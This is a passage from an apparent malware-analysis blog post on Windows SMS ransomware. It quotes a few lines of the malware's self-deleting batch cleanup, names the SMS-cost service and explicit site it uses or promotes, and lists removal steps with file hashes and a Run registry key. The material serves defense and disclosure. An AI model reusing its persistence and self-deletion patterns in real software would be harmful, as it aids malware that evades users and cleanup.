<span style="font-size: x-small;"><span style="font-family: "Courier New",Courier,monospace;">…</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">del C:\Documents and Settings\All Users\Media\module.exe</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">if exist C:\Documents and Settings\All Users\Media\module.exe goto try</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">del C:\WINDOWS\system32\sc.ini</span></span><br />
<span style="font-size: x-small;"><span style="font-family: "Courier New",Courier,monospace;">del C:\WINDOWS\system32\delself.bat</span></span><br />
<br />
<div style="text-align: justify;">The malware uses the service <b>SmsCost</b> (<b>smscost.ru</b>) to provide information on the cost of the SMS message.</div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/_Mcy4oUq8gAQ/TB5SnGOFs3I/AAAAAAAAALs/_hhPOfFztGs/s1600/smscost.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/_Mcy4oUq8gAQ/TB5SnGOFs3I/AAAAAAAAALs/_hhPOfFztGs/s320/smscost.png" /></a></div><br />
<div style="text-align: justify;">In addition to promoting another page with sexually explicit material through which also spreads malware (<b>amporno.ru</b>).</div><br />
<span style="font-size: large;"><b>Countermeasures</b></span><br />
Remove the "module" process through task manager (Ctrl + Alt + Del).<br />
Search and delete the following processes:<br />
<ul><li>module.exe <span style="font-size: x-small;">(MD5: 4D6C1F95ED90DDEE122FC749FCE1084E)</span></li>
<li>sc.ini <span style="font-size: x-small;">(</span><span style="font-size: x-small;">MD5: </span><span style="font-size: x-small;">FEADA1AF5309D97A537D02DD6678E847)</span></li>
<li>delself.bat<span style="font-size: x-small;"> (</span><span style="font-size: x-small;">MD5: </span><span style="font-size: x-small;">E327DE8BC4BC1183CC9A60776717DA38)</span></li>
</ul>Delete the folder hosted on Media C:\Documents and Settings\All Users\Media<br />
<br />
Delete the following registry key:<br />
HKCU\Software\Microsoft\Windows\CurrentVersion\Run<br />
Module > c:\documents and settings\all users\media\module.exe<br />
<br />
Install an updated antivirus security program and perform a deep scan mode.<br />
<br />
<br />
<b>Related information</b><br />
<div style="color: orange;"><div style="color: orange;"><a href="http://www.blogger.com/goog_2000293822">New variant of ransomware through porn sites</a><a href="http://malwaredisasters.blogspot.com/2010/05/new-variant-of-ransomware-through-porn.html"> II </a></div><div style="color: orange;"><a href="http://malwaredisasters.blogspot.com/2010/04/new-variant-of-ransomware-through-porn.html">New variant of ransomware through porn sites</a></div><div style="color: orange;"><a href="http://malwaredisasters.blogspot.com/2010/03/another-very-active-sms-ransomware.html">Another very active SMS Ransomware</a></div><a href="http://malwaredisasters.blogspot.com/2010/03/sms-ransomware-for-windows-in-wild.html" style="color: orange;">SMS Ransomware for Windows In-the-Wild</a> </div><div class="blogger-post-footer">https://twitter.com/MalwareInt</div>Unknownnoreply@blogger.com1